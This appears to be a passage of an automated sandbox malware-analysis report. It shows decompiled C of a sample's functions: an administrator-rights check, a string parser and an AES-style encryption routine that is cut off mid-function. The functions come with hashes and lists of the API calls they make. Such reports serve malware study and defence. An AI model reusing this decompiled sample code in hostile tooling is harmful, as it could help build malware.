                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$wsprintf$BinaryCryptFreeStringlstrlen
                                    • String ID:
                                    • API String ID: 2885909284-0
                                    • Opcode ID: 4b577a2fca5175dc817a5f0a822f0b1f2b1b2ce44ebef64a106c43ffda3d23e6
                                    • Instruction ID: f5b68047144edc6014334e46e75f4d35dd78ef74ad5e526f4ecfaf4aeb28bad9
                                    • Opcode Fuzzy Hash: 4b577a2fca5175dc817a5f0a822f0b1f2b1b2ce44ebef64a106c43ffda3d23e6
                                    • Instruction Fuzzy Hash: 4321C375A803187BEB119EA48C41F9ABFACEF85750F110065F604EB281D7B57A518B90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 63%
                                    			E0F143C70() {
                                    				signed int _v8;
                                    				void* _v12;
                                    				short _v16;
                                    				struct _SID_IDENTIFIER_AUTHORITY _v20;
                                    				int _t13;
                                    				_Unknown_base(*)()* _t15;
                                    				signed int _t16;
                                    
                                    				_v20.Value = 0;
                                    				_v16 = 0x500;
                                    				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                                    				if(_t13 != 0) {
                                    					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
                                    					_t16 =  *_t15(0, _v12,  &_v8);
                                    					asm("sbb eax, eax");
                                    					_v8 = _v8 &  ~_t16;
                                    					FreeSid(_v12);
                                    					return _v8;
                                    				} else {
                                    					return _t13;
                                    				}
                                    			}










                                    0x0f143c79
                                    0x0f143c99
                                    0x0f143ca0
                                    0x0f143ca8
                                    0x0f143cbf
                                    0x0f143cce
                                    0x0f143cd5
                                    0x0f143cd7
                                    0x0f143cda
                                    0x0f143ce6
                                    0x0f143cad
                                    0x0f143cad
                                    0x0f143cad

                                    APIs
                                    • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F143CA0
                                    • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0F143CB3
                                    • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0F143CBF
                                    • FreeSid.ADVAPI32(?), ref: 0F143CDA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressAllocateFreeHandleInitializeModuleProc
                                    • String ID: CheckTokenMembership$advapi32.dll
                                    • API String ID: 3309497720-1888249752
                                    • Opcode ID: 74052795d49f511dfe6d4eac2ceb188cc5887e84c29efce99224ec00973fe53b
                                    • Instruction ID: e10ec616be18126487a1a478f41c33cdc83980dfb08f2d1041887518e7b17b19
                                    • Opcode Fuzzy Hash: 74052795d49f511dfe6d4eac2ceb188cc5887e84c29efce99224ec00973fe53b
                                    • Instruction Fuzzy Hash: 67F04F34A80309BBEF00DFE4DC0AFAD7778EF44716F000594F900A6281E77576688B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F143200(void* __ecx, CHAR* _a4, intOrPtr _a8) {
                                    				char _t5;
                                    				char _t6;
                                    				intOrPtr _t8;
                                    				int _t10;
                                    				CHAR* _t13;
                                    				int _t15;
                                    				void* _t18;
                                    				CHAR* _t21;
                                    				CHAR* _t23;
                                    
                                    				_t23 = _a4;
                                    				_t18 = __ecx;
                                    				_t5 =  *_t23;
                                    				if(_t5 == 0) {
                                    					L4:
                                    					_t6 =  *_t23;
                                    					if(_t6 == 0x7d) {
                                    						goto L10;
                                    					} else {
                                    						_t21 = _t23;
                                    						if(_t6 != 0) {
                                    							while( *_t21 != 0x7d) {
                                    								_t21 =  &(_t21[1]);
                                    								if( *_t21 != 0) {
                                    									continue;
                                    								} else {
                                    								}
                                    								goto L12;
                                    							}
                                    							 *_t21 = 0;
                                    						}
                                    						L12:
                                    						_t8 = _a8;
                                    						if(_t8 != 1) {
                                    							if(_t8 == 2) {
                                    								_t10 = lstrlenA(_t23);
                                    								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
                                    								 *(_t18 + 8) = _t13;
                                    								goto L16;
                                    							}
                                    						} else {
                                    							_t15 = lstrlenA(_t23);
                                    							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
                                    							 *(_t18 + 4) = _t13;
                                    							L16:
                                    							if(_t13 != 0) {
                                    								lstrcpyA(_t13, _t23);
                                    							}
                                    						}
                                    						 *_t21 = 0x7d;
                                    						return 1;
                                    					}
                                    				} else {
                                    					while(_t5 != 0x7d) {
                                    						_t23 =  &(_t23[1]);
                                    						if(_t5 == 0x3d) {
                                    							goto L4;
                                    						} else {
                                    							_t5 =  *_t23;
                                    							if(_t5 != 0) {
                                    								continue;
                                    							} else {
                                    								goto L4;
                                    							}
                                    						}
                                    						goto L19;
                                    					}
                                    					L10:
                                    					return 0;
                                    				}
                                    				L19:
                                    			}












                                    0x0f143205
                                    0x0f143208
                                    0x0f14320a
                                    0x0f14320e
                                    0x0f14321f
                                    0x0f14321f
                                    0x0f143223
                                    0x00000000
                                    0x0f143225
                                    0x0f143226
                                    0x0f14322a
                                    0x0f143230
                                    0x0f143235
                                    0x0f143239
                                    0x00000000
                                    0x00000000
                                    0x0f14323b
                                    0x00000000
                                    0x0f143239
                                    0x0f143245
                                    0x0f143245
                                    0x0f143248
                                    0x0f143248
                                    0x0f14324e
                                    0x0f143270
                                    0x0f143273
                                    0x0f143284
                                    0x0f14328a
                                    0x00000000
                                    0x0f14328a
                                    0x0f143250
                                    0x0f143251
                                    0x0f143262
                                    0x0f143268
                                    0x0f14328d
                                    0x0f14328f
                                    0x0f143293
                                    0x0f143293
                                    0x0f14328f
                                    0x0f143299
                                    0x0f1432a5
                                    0x0f1432a5
                                    0x0f143210
                                    0x0f143210
                                    0x0f143214
                                    0x0f143217
                                    0x00000000
                                    0x0f143219
                                    0x0f143219
                                    0x0f14321d
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f14321d
                                    0x00000000
                                    0x0f143217
                                    0x0f14323e
                                    0x0f143242
                                    0x0f143242
                                    0x00000000

                                    APIs
                                    • lstrlenA.KERNEL32(0F145444,00000000,?,0F145445,?,0F1434BF,0F145445,00000001,0F145445,00000000,00000000,00000000,?,?,0F145444,00000000), ref: 0F143251
                                    • GetProcessHeap.KERNEL32(00000008,00000001,?,0F1434BF,0F145445,00000001,0F145445,00000000,00000000,00000000,?,?,0F145444,00000000), ref: 0F14325B
                                    • HeapAlloc.KERNEL32(00000000,?,0F1434BF,0F145445,00000001,0F145445,00000000,00000000,00000000,?,?,0F145444,00000000), ref: 0F143262
                                    • lstrlenA.KERNEL32(0F145444,00000000,?,0F145445,?,0F1434BF,0F145445,00000001,0F145445,00000000,00000000,00000000,?,?,0F145444,00000000), ref: 0F143273
                                    • GetProcessHeap.KERNEL32(00000008,00000001,?,0F1434BF,0F145445,00000001,0F145445,00000000,00000000,00000000,?,?,0F145444,00000000), ref: 0F14327D
                                    • HeapAlloc.KERNEL32(00000000,?,0F1434BF,0F145445,00000001,0F145445,00000000,00000000,00000000,?,?,0F145444,00000000), ref: 0F143284
                                    • lstrcpyA.KERNEL32(00000000,0F145444,?,0F1434BF,0F145445,00000001,0F145445,00000000,00000000,00000000,?,?,0F145444,00000000), ref: 0F143293
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocProcesslstrlen$lstrcpy
                                    • String ID:
                                    • API String ID: 511007297-0
                                    • Opcode ID: 1d56711c4b3325411edfb7f2f3cb804a4f3febb5d0086898d72788b1c624637e
                                    • Instruction ID: 517051ff16c0f5fce1ccb1d632c3f25dd75ff1df29530cf7c28456a03545282d
                                    • Opcode Fuzzy Hash: 1d56711c4b3325411edfb7f2f3cb804a4f3febb5d0086898d72788b1c624637e
                                    • Instruction Fuzzy Hash: 6011B9344441956FEB110F689408FA67B68FF82761F544119F8E5CB242C739B4B69B61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 90%
                                    			E0F141C20(signed int* __ebx, signed int* __edi, signed int* __esi) {
                                    				signed int _t514;
                                    				signed char _t522;
                                    				signed char _t530;
                                    				signed char _t538;
                                    				signed char _t546;
                                    				signed char _t554;
                                    				signed char _t562;
                                    				signed char _t570;
                                    				signed char _t578;
                                    				signed char _t586;
                                    				void* _t595;
                                    				signed char _t603;
                                    				signed char _t618;
                                    				signed int _t628;
                                    				signed char _t630;
                                    				signed char _t631;
                                    				signed char _t633;
                                    				signed char _t635;
                                    				signed char _t636;
                                    				signed char _t638;
                                    				signed char _t640;
                                    				signed char _t641;
                                    				signed char _t643;
                                    				signed char _t645;
                                    				signed char _t646;
                                    				signed char _t648;
                                    				signed char _t650;
                                    				signed char _t651;
                                    				signed char _t653;
                                    				signed char _t655;
                                    				signed char _t656;
                                    				signed char _t658;
                                    				signed char _t660;
                                    				signed char _t661;
                                    				signed char _t663;
                                    				signed char _t665;
                                    				signed char _t666;
                                    				signed char _t668;
                                    				signed char _t670;
                                    				signed char _t671;
                                    				signed char _t673;
                                    				signed char _t675;
                                    				signed char _t676;
                                    				signed char _t681;
                                    				signed char _t682;
                                    				signed char _t684;
                                    				signed char _t686;
                                    				signed char _t687;
                                    				signed char _t690;
                                    				signed char _t691;
                                    				signed char _t693;
                                    				signed char _t695;
                                    				signed char _t696;
                                    				signed int _t699;
                                    				signed char _t700;
                                    				signed char _t708;
                                    				signed char _t709;
                                    				signed char _t717;
                                    				signed char _t718;
                                    				signed char _t726;
                                    				signed char _t727;
                                    				signed char _t735;
                                    				signed char _t736;
                                    				signed char _t744;
                                    				signed char _t745;
                                    				signed char _t753;
                                    				signed char _t754;
                                    				signed char _t762;
                                    				signed char _t763;
                                    				signed char _t771;
                                    				signed char _t772;
                                    				signed char _t780;
                                    				signed char _t781;
                                    				signed char _t789;
                                    				signed char _t797;
                                    				signed char _t798;
                                    				signed char _t806;
                                    				signed char _t814;
                                    				signed char _t815;
                                    				signed int _t824;
                                    				signed char _t825;
                                    				signed char _t826;
                                    				signed char _t827;
                                    				signed char _t828;
                                    				signed char _t829;
                                    				signed char _t830;
                                    				signed char _t831;
                                    				signed char _t832;
                                    				signed char _t833;
                                    				signed char _t834;
                                    				signed char _t835;
                                    				signed char _t836;
                                    				signed char _t837;
                                    				signed char _t838;
                                    				signed char _t839;
                                    				signed char _t840;
                                    				signed char _t841;
                                    				signed char _t842;
                                    				signed char _t843;
                                    				signed char _t844;
                                    				signed char _t845;
                                    				signed char _t846;
                                    				signed char _t847;
                                    				signed char _t848;
                                    				signed char _t849;
                                    				signed int _t851;
                                    				signed int* _t924;
                                    				signed int* _t997;
                                    				signed int* _t998;
                                    				signed int* _t999;
                                    				signed int* _t1011;
                                    				signed int* _t1012;
                                    				signed int* _t1024;
                                    				signed int* _t1025;
                                    				signed int* _t1037;
                                    				signed int* _t1038;
                                    				signed int* _t1050;
                                    				signed int* _t1051;
                                    				signed int* _t1063;
                                    				signed int* _t1064;
                                    				signed int* _t1076;
                                    				signed int* _t1077;
                                    				signed int* _t1089;
                                    				signed int* _t1090;
                                    				signed int* _t1102;
                                    				signed int* _t1103;
                                    				signed int* _t1115;
                                    				signed int* _t1116;
                                    				signed int* _t1128;
                                    				signed int* _t1129;
                                    				signed int* _t1131;
                                    				signed int* _t1143;
                                    				signed int* _t1144;
                                    				signed int* _t1156;
                                    				signed int* _t1168;
                                    				signed int* _t1169;
                                    				signed int** _t1181;
                                    
                                    				_t1181[4] = _t997;
                                    				_t1181[3] = __ebx;
                                    				_t1181[2] = __esi;
                                    				_t1181[1] = __edi;
                                    				_t924 = _t1181[6];
                                    				_t998 = _t1181[8];
                                    				_t851 = _t998[0x3c] & 0x000000ff;
                                    				_t514 =  *_t924 ^  *_t998;
                                    				_t628 = _t924[1] ^ _t998[1];
                                    				_t699 = _t924[2] ^ _t998[2];
                                    				_t824 = _t924[3] ^ _t998[3];
                                    				if(_t851 == 0xa0) {
                                    					L6:
                                    					_t999 =  &(_t998[4]);
                                    					 *_t1181 = _t999;
                                    					asm("rol eax, 0x10");
                                    					_t630 = _t628 & 0xffff0000 | _t514 >> 0x00000010;
                                    					_t700 = _t699 >> 0x10;
                                    					_t631 = _t630 >> 0x10;
                                    					_t825 = _t824 >> 0x10;
                                    					_t708 = _t999[2] ^  *(0xf14c240 + (_t699 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t628 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t514 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t825 & 0x000000ff) * 4);
                                    					_t826 = _t999[3] ^  *(0xf14c240 + (_t824 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t699 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t514 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t631 & 0x000000ff) * 4);
                                    					_t1011 =  *_t1181;
                                    					_t522 =  *(0xf14ca40 + (_t700 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t630 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t824 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t631 & 0x000000ff) * 4) ^  *_t1011;
                                    					_t633 =  *(0xf14c240 + (_t628 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t630 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t700 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t825 & 0x000000ff) * 4) ^ _t1011[1];
                                    					_t1012 =  &(_t1011[4]);
                                    					 *_t1181 = _t1012;
                                    					asm("rol eax, 0x10");
                                    					_t635 = _t633 & 0xffff0000 | _t522 >> 0x00000010;
                                    					_t709 = _t708 >> 0x10;
                                    					_t636 = _t635 >> 0x10;
                                    					_t827 = _t826 >> 0x10;
                                    					_t717 = _t1012[2] ^  *(0xf14c240 + (_t708 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t633 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t522 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t827 & 0x000000ff) * 4);
                                    					_t828 = _t1012[3] ^  *(0xf14c240 + (_t826 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t708 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t522 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t636 & 0x000000ff) * 4);
                                    					_t1024 =  *_t1181;
                                    					_t530 =  *(0xf14ca40 + (_t709 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t635 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t826 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t636 & 0x000000ff) * 4) ^  *_t1024;
                                    					_t638 =  *(0xf14c240 + (_t633 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t635 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t709 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t827 & 0x000000ff) * 4) ^ _t1024[1];
                                    					_t1025 =  &(_t1024[4]);
                                    					 *_t1181 = _t1025;
                                    					asm("rol eax, 0x10");
                                    					_t640 = _t638 & 0xffff0000 | _t530 >> 0x00000010;
                                    					_t718 = _t717 >> 0x10;
                                    					_t641 = _t640 >> 0x10;
                                    					_t829 = _t828 >> 0x10;
                                    					_t726 = _t1025[2] ^  *(0xf14c240 + (_t717 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t638 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t530 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t829 & 0x000000ff) * 4);
                                    					_t830 = _t1025[3] ^  *(0xf14c240 + (_t828 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t717 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t530 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t641 & 0x000000ff) * 4);
                                    					_t1037 =  *_t1181;
                                    					_t538 =  *(0xf14ca40 + (_t718 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t640 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t828 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t641 & 0x000000ff) * 4) ^  *_t1037;
                                    					_t643 =  *(0xf14c240 + (_t638 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t640 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t718 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t829 & 0x000000ff) * 4) ^ _t1037[1];
                                    					_t1038 =  &(_t1037[4]);
                                    					 *_t1181 = _t1038;
                                    					asm("rol eax, 0x10");
                                    					_t645 = _t643 & 0xffff0000 | _t538 >> 0x00000010;
                                    					_t727 = _t726 >> 0x10;
                                    					_t646 = _t645 >> 0x10;
                                    					_t831 = _t830 >> 0x10;
                                    					_t735 = _t1038[2] ^  *(0xf14c240 + (_t726 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t643 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t538 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t831 & 0x000000ff) * 4);
                                    					_t832 = _t1038[3] ^  *(0xf14c240 + (_t830 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t726 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t538 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t646 & 0x000000ff) * 4);
                                    					_t1050 =  *_t1181;
                                    					_t546 =  *(0xf14ca40 + (_t727 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t645 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t830 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t646 & 0x000000ff) * 4) ^  *_t1050;
                                    					_t648 =  *(0xf14c240 + (_t643 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t645 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t727 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t831 & 0x000000ff) * 4) ^ _t1050[1];
                                    					_t1051 =  &(_t1050[4]);
                                    					 *_t1181 = _t1051;
                                    					asm("rol eax, 0x10");
                                    					_t650 = _t648 & 0xffff0000 | _t546 >> 0x00000010;
                                    					_t736 = _t735 >> 0x10;
                                    					_t651 = _t650 >> 0x10;
                                    					_t833 = _t832 >> 0x10;
                                    					_t744 = _t1051[2] ^  *(0xf14c240 + (_t735 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t648 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t546 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t833 & 0x000000ff) * 4);
                                    					_t834 = _t1051[3] ^  *(0xf14c240 + (_t832 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t735 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t546 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t651 & 0x000000ff) * 4);
                                    					_t1063 =  *_t1181;
                                    					_t554 =  *(0xf14ca40 + (_t736 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t650 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t832 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t651 & 0x000000ff) * 4) ^  *_t1063;
                                    					_t653 =  *(0xf14c240 + (_t648 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t650 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t736 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t833 & 0x000000ff) * 4) ^ _t1063[1];
                                    					_t1064 =  &(_t1063[4]);
                                    					 *_t1181 = _t1064;
                                    					asm("rol eax, 0x10");
                                    					_t655 = _t653 & 0xffff0000 | _t554 >> 0x00000010;
                                    					_t745 = _t744 >> 0x10;
                                    					_t656 = _t655 >> 0x10;
                                    					_t835 = _t834 >> 0x10;
                                    					_t753 = _t1064[2] ^  *(0xf14c240 + (_t744 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t653 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t554 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t835 & 0x000000ff) * 4);
                                    					_t836 = _t1064[3] ^  *(0xf14c240 + (_t834 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t744 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t554 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t656 & 0x000000ff) * 4);
                                    					_t1076 =  *_t1181;
                                    					_t562 =  *(0xf14ca40 + (_t745 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t655 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t834 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t656 & 0x000000ff) * 4) ^  *_t1076;
                                    					_t658 =  *(0xf14c240 + (_t653 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t655 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t745 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t835 & 0x000000ff) * 4) ^ _t1076[1];
                                    					_t1077 =  &(_t1076[4]);
                                    					 *_t1181 = _t1077;
                                    					asm("rol eax, 0x10");
                                    					_t660 = _t658 & 0xffff0000 | _t562 >> 0x00000010;
                                    					_t754 = _t753 >> 0x10;
                                    					_t661 = _t660 >> 0x10;
                                    					_t837 = _t836 >> 0x10;
                                    					_t762 = _t1077[2] ^  *(0xf14c240 + (_t753 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t658 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t562 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t837 & 0x000000ff) * 4);
                                    					_t838 = _t1077[3] ^  *(0xf14c240 + (_t836 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t753 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t562 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t661 & 0x000000ff) * 4);
                                    					_t1089 =  *_t1181;
                                    					_t570 =  *(0xf14ca40 + (_t754 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t660 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t836 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t661 & 0x000000ff) * 4) ^  *_t1089;
                                    					_t663 =  *(0xf14c240 + (_t658 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t660 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t754 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t837 & 0x000000ff) * 4) ^ _t1089[1];
                                    					_t1090 =  &(_t1089[4]);
                                    					 *_t1181 = _t1090;
                                    					asm("rol eax, 0x10");
                                    					_t665 = _t663 & 0xffff0000 | _t570 >> 0x00000010;
                                    					_t763 = _t762 >> 0x10;
                                    					_t666 = _t665 >> 0x10;
                                    					_t839 = _t838 >> 0x10;
                                    					_t771 = _t1090[2] ^  *(0xf14c240 + (_t762 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t663 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t570 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t839 & 0x000000ff) * 4);
                                    					_t840 = _t1090[3] ^  *(0xf14c240 + (_t838 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t762 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t570 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t666 & 0x000000ff) * 4);
                                    					_t1102 =  *_t1181;
                                    					_t578 =  *(0xf14ca40 + (_t763 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t665 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t838 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t666 & 0x000000ff) * 4) ^  *_t1102;
                                    					_t668 =  *(0xf14c240 + (_t663 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t665 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t763 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t839 & 0x000000ff) * 4) ^ _t1102[1];
                                    					_t1103 =  &(_t1102[4]);
                                    					 *_t1181 = _t1103;
                                    					asm("rol eax, 0x10");
                                    					_t670 = _t668 & 0xffff0000 | _t578 >> 0x00000010;
                                    					_t772 = _t771 >> 0x10;
                                    					_t671 = _t670 >> 0x10;
                                    					_t841 = _t840 >> 0x10;
                                    					_t780 = _t1103[2] ^  *(0xf14c240 + (_t771 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t668 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t578 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t841 & 0x000000ff) * 4);
                                    					_t842 = _t1103[3] ^  *(0xf14c240 + (_t840 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t771 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t578 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t671 & 0x000000ff) * 4);
                                    					_t1115 =  *_t1181;
                                    					_t586 =  *(0xf14ca40 + (_t772 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t670 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t840 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t671 & 0x000000ff) * 4) ^  *_t1115;
                                    					_t673 =  *(0xf14c240 + (_t668 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t670 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t772 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t841 & 0x000000ff) * 4) ^ _t1115[1];
                                    					_t1116 =  &(_t1115[4]);
                                    					 *_t1181 = _t1116;
                                    					asm("rol eax, 0x10");
                                    					_t675 = _t673 & 0xffff0000 | _t586 >> 0x00000010;
                                    					_t781 = _t780 >> 0x10;
                                    					_t676 = _t675 >> 0x10;
                                    					_t843 = _t842 >> 0x10;
                                    					_t1128 =  *_t1181;
                                    					_t1129 = _t1181[7];
                                    					 *_t1129 =  *(0xf14da40 + (_t781 & 0x000000ff) * 4) ^  *(0xf14d240 + (_t675 & 0x000000ff) * 4) ^  *(0xf14d640 + (_t842 & 0x000000ff) * 4) ^  *(0xf14de40 + (_t676 & 0x000000ff) * 4) ^  *_t1128;
                                    					_t1129[1] =  *(0xf14d240 + (_t673 & 0x000000ff) * 4) ^  *(0xf14d640 + (_t675 & 0x000000ff) * 4) ^  *(0xf14de40 + (_t781 & 0x000000ff) * 4) ^  *(0xf14da40 + (_t843 & 0x000000ff) * 4) ^ _t1128[1];
                                    					_t1129[2] = _t1116[2] ^  *(0xf14d240 + (_t780 & 0x000000ff) * 4) ^  *(0xf14d640 + (_t673 & 0x000000ff) * 4) ^  *(0xf14da40 + (_t586 & 0x000000ff) * 4) ^  *(0xf14de40 + (_t843 & 0x000000ff) * 4);
                                    					_t1129[3] = _t1116[3] ^  *(0xf14d240 + (_t842 & 0x000000ff) * 4) ^  *(0xf14d640 + (_t780 & 0x000000ff) * 4) ^  *(0xf14de40 + (_t586 & 0x000000ff) * 4) ^  *(0xf14da40 + (_t676 & 0x000000ff) * 4);
                                    					_t595 = 0;
                                    				} else {
                                    					if(_t851 == 0xc0) {
                                    						L5:
                                    						_t1131 =  &(_t998[4]);
                                    						 *_t1181 = _t1131;
                                    						asm("rol eax, 0x10");
                                    						_t681 = _t628 & 0xffff0000 | _t514 >> 0x00000010;
                                    						_t789 = _t699 >> 0x10;
                                    						_t682 = _t681 >> 0x10;
                                    						_t844 = _t824 >> 0x10;
                                    						_t797 = _t1131[2] ^  *(0xf14c240 + (_t699 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t628 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t514 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t844 & 0x000000ff) * 4);
                                    						_t845 = _t1131[3] ^  *(0xf14c240 + (_t824 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t699 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t514 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t682 & 0x000000ff) * 4);
                                    						_t1143 =  *_t1181;
